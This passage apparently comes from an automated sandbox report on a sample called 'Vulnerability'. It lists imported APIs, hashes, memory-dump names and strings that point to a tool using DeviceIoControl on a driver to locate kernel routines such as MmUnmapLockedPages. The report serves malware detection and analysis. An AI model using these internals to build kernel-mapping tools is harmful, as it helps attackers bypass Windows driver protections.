                                                      • Part of subcall function 00007FF7738EC7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC819
                                                      • Part of subcall function 00007FF7738EC7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC844
                                                      • Part of subcall function 00007FF7738EC7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7738EC85D
                                                      • Part of subcall function 00007FF7738EC7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC87C
                                                    • ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA090
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA0A7
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
                                                    • String ID:
                                                    • API String ID: 3911317180-0
                                                    • Opcode ID: 19bad8e0e1a4c278d1f87a288ed97d8dbe98bc2c7c7cfbbf4d8a2ae65ea95ba5
                                                    • Instruction ID: f4d72a2cf2aacb539e0c51994ee8fa8ae83998245a15b12bbd048fe9afed527d
                                                    • Opcode Fuzzy Hash: 19bad8e0e1a4c278d1f87a288ed97d8dbe98bc2c7c7cfbbf4d8a2ae65ea95ba5
                                                    • Instruction Fuzzy Hash: 30314D33639B4682EB90AF25A844329F3A4FB88F89F440235DA8D57758DF3ED454C760
                                                    APIs
                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA_N_N@Z.MSVCP140 ref: 00007FF7738EA635
                                                    • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA656
                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738EA6CA
                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738EA73F
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA782
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: D@std@@@std@@U?$char_traits@$?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@Vlocale@2@
                                                    • String ID:
                                                    • API String ID: 481934583-0
                                                    • Opcode ID: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
                                                    • Instruction ID: 76c8969bcf13d25ca440aaa15311855e9293cff916baa904879de624f04fe43f
                                                    • Opcode Fuzzy Hash: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
                                                    • Instruction Fuzzy Hash: BC518C23629A4181DB90DF1AE590239EBA0FB85F94F458231DE5E577A4CF3EC462C360
                                                    APIs
                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E89F3
                                                    • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E8A12
                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E8A44
                                                    • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E8A5F
                                                      • Part of subcall function 00007FF7738E9FB0: ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7738E9FEA
                                                      • Part of subcall function 00007FF7738E9FB0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA007
                                                      • Part of subcall function 00007FF7738E9FB0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738EA030
                                                      • Part of subcall function 00007FF7738E9FB0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA07B
                                                      • Part of subcall function 00007FF7738E9FB0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA090
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E8AA9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
                                                    • String ID:
                                                    • API String ID: 219286276-0
                                                    • Opcode ID: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
                                                    • Instruction ID: c6abf04e15e989fa23d1587d47280d26fd66bdc97c925b596f69a340e1f9d625
                                                    • Opcode Fuzzy Hash: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
                                                    • Instruction Fuzzy Hash: 3A213932624B8286EB509F29E854329B7A0FB99B88F848235DA8D53724DF3ED155CB50
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$CleanupModule64Unload_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1118963909-0
                                                    • Opcode ID: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
                                                    • Instruction ID: 71de1c13d292e406838f19abe7fb4a648a671dddb6a2f800b471bd0443843cc8
                                                    • Opcode Fuzzy Hash: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
                                                    • Instruction Fuzzy Hash: 02216563A3464682EB54EB25D45833DA361EB54F89F900131DA0D16659DFBFD8D4C360
                                                    APIs
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,0492492492492493,00007FF7738EF8F6,?,?,00000000,00000000,?,00000000), ref: 00007FF7738F00F9
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F01A9
                                                      • Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                    • String ID: gfffffff$gfffffff
                                                    • API String ID: 1934640635-161084747
                                                    • Opcode ID: e28ea14212bf07c75c9a2bd1f11eebad4276c806f5aa789c437229e0e1ab6bf7
                                                    • Instruction ID: 79e59b848c498d5c5db0da4c30ca3ae7e6433e917d85f391eeba18743a2153f8
                                                    • Opcode Fuzzy Hash: e28ea14212bf07c75c9a2bd1f11eebad4276c806f5aa789c437229e0e1ab6bf7
                                                    • Instruction Fuzzy Hash: 8151E373635B4646EE54EB13F440269E3A4EB58BC0F944232DA9C97784DF3DD0A18321
                                                    APIs
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7204
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7256
                                                      • Part of subcall function 00007FF7738EC580: GetModuleHandleA.KERNEL32 ref: 00007FF7738EC5D0
                                                      • Part of subcall function 00007FF7738EC580: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EC5F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$HandleModule_invalid_parameter_noinfo_noreturn
                                                    • String ID: RtlLookupElementGenericTableAvl$[!] Failed to find RtlLookupElementGenericTableAvl
                                                    • API String ID: 1378083526-1952825546
                                                    • Opcode ID: 9867886cfc6189a73deae424fe4919759d3be13eabd7a4807b4d814dd99afecc
                                                    • Instruction ID: adaa020dc8b93f6380c395b7c9392ec75d9a17186ddebf55053ad1b3ede1dc3f
                                                    • Opcode Fuzzy Hash: 9867886cfc6189a73deae424fe4919759d3be13eabd7a4807b4d814dd99afecc
                                                    • Instruction Fuzzy Hash: B8419423E38B8241E690EB24E480379E361FB95790F905335FAAD566A5DF3ED0948720
                                                    APIs
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F90
                                                      • Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                    • String ID: ExAcquireResourceExclusiveLite$[!] Failed to find ExAcquireResourceExclusiveLite
                                                    • API String ID: 4162525100-2131800721
                                                    • Opcode ID: 23ad26a5e52ceea44d2795d41e143b7d509da478648eea974c83f5949071cd27
                                                    • Instruction ID: 56479585c52482e9b52408177576b5fe2a1aeb81d17200668cc1a47f738dd31f
                                                    • Opcode Fuzzy Hash: 23ad26a5e52ceea44d2795d41e143b7d509da478648eea974c83f5949071cd27
                                                    • Instruction Fuzzy Hash: 70319663E38A4352FAC0F724E480279E350AF90794FC05331E91D662E5DE3EE4A48730
                                                    APIs
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E61CE
                                                      • Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E618E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                    • String ID: MmUnmapLockedPages$[!] Failed to find MmUnmapLockedPages
                                                    • API String ID: 4162525100-2848997145
                                                    • Opcode ID: f6198ef0109830dbfd71a9362fd27ef6e1445ed62c2e64b09084b95777afc308
                                                    • Instruction ID: 3ce68ae0ef6533f6a01437d245aad92aaf2165ecac0eb518da3256ed4d688c9e
                                                    • Opcode Fuzzy Hash: f6198ef0109830dbfd71a9362fd27ef6e1445ed62c2e64b09084b95777afc308
                                                    • Instruction Fuzzy Hash: FB31A663F38A4781EA80EB25E580279E360EF94794FC05331E95C666A6DE3EE5D48730
                                                    APIs
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E6422
                                                      • Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E63E0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                    • String ID: ExFreePool$[!] Failed to find ExAllocatePool
                                                    • API String ID: 4162525100-3091510598
                                                    • Opcode ID: 270ab59036c19fb5b3f6f0beef8d4a7d86f721c2eafbb1d7ae8509a07653a203
                                                    • Instruction ID: b18e8ae01434ab159adda8707af634126c576aad22cbeabbd55a498ce0ab446c
                                                    • Opcode Fuzzy Hash: 270ab59036c19fb5b3f6f0beef8d4a7d86f721c2eafbb1d7ae8509a07653a203
                                                    • Instruction Fuzzy Hash: 76219FA3E78B4381EA80E724E480179E361AF957D8FC05331E95D662E5DF3EE5A4C630
                                                    APIs
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E62F7
                                                      • Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0
                                                      • Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28
                                                      • Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
                                                      • Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E62B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                    • String ID: MmFreePagesFromMdl$[!] Failed to find MmFreePagesFromMdl
                                                    • API String ID: 4162525100-1029121595
                                                    • Opcode ID: ef8dd4537f4b8719acdec15be03d93be2543304a967b88f41ad63023bad5f0f9
                                                    • Instruction ID: 2a2cd0de3da1e2f7f158341066c31a384197df8932a74ed04a7479af82f345d7
                                                    • Opcode Fuzzy Hash: ef8dd4537f4b8719acdec15be03d93be2543304a967b88f41ad63023bad5f0f9
                                                    • Instruction Fuzzy Hash: 4821B463E38A5741EA80FB24E880275E361BF94794FC05331E95CA66E5DF3EE5A4C630
                                                    APIs
                                                      • Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E606C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                    • String ID: PAGE$[!] Failed to find MmFreeIndependentPages$xxxxxxxxx????xxxxxxx
                                                    • API String ID: 310790477-3730907401
                                                    • Opcode ID: 3a02ea0e592aa42476571c03a94be0304070044ade117e58495c3f36bb0fc752
                                                    • Instruction ID: 0499fffc83df92f7fd41056ab60570819a611c1f68a0c344976c6a199c541eaf
                                                    • Opcode Fuzzy Hash: 3a02ea0e592aa42476571c03a94be0304070044ade117e58495c3f36bb0fc752
                                                    • Instruction Fuzzy Hash: 8F213072A38B4391EA80AB15F4403A5E3A0FF95788FD04135EA4C2B655DF3EE564CB30
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                    • String ID:
                                                    • API String ID: 2138705365-0
                                                    • Opcode ID: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
                                                    • Instruction ID: ad6fbed006295b367d88613076a8a9207db232b66bca21a9abfdc92edac9988c
                                                    • Opcode Fuzzy Hash: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
                                                    • Instruction Fuzzy Hash: 02819073A24A8291EB44EF25D48436CE361FB54F88F909032D74D17669EF7AD8E4C360
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF604
                                                      • Part of subcall function 00007FF7738ECD60: memmove.VCRUNTIME140 ref: 00007FF7738ECE27
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF749
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF750
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF757
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
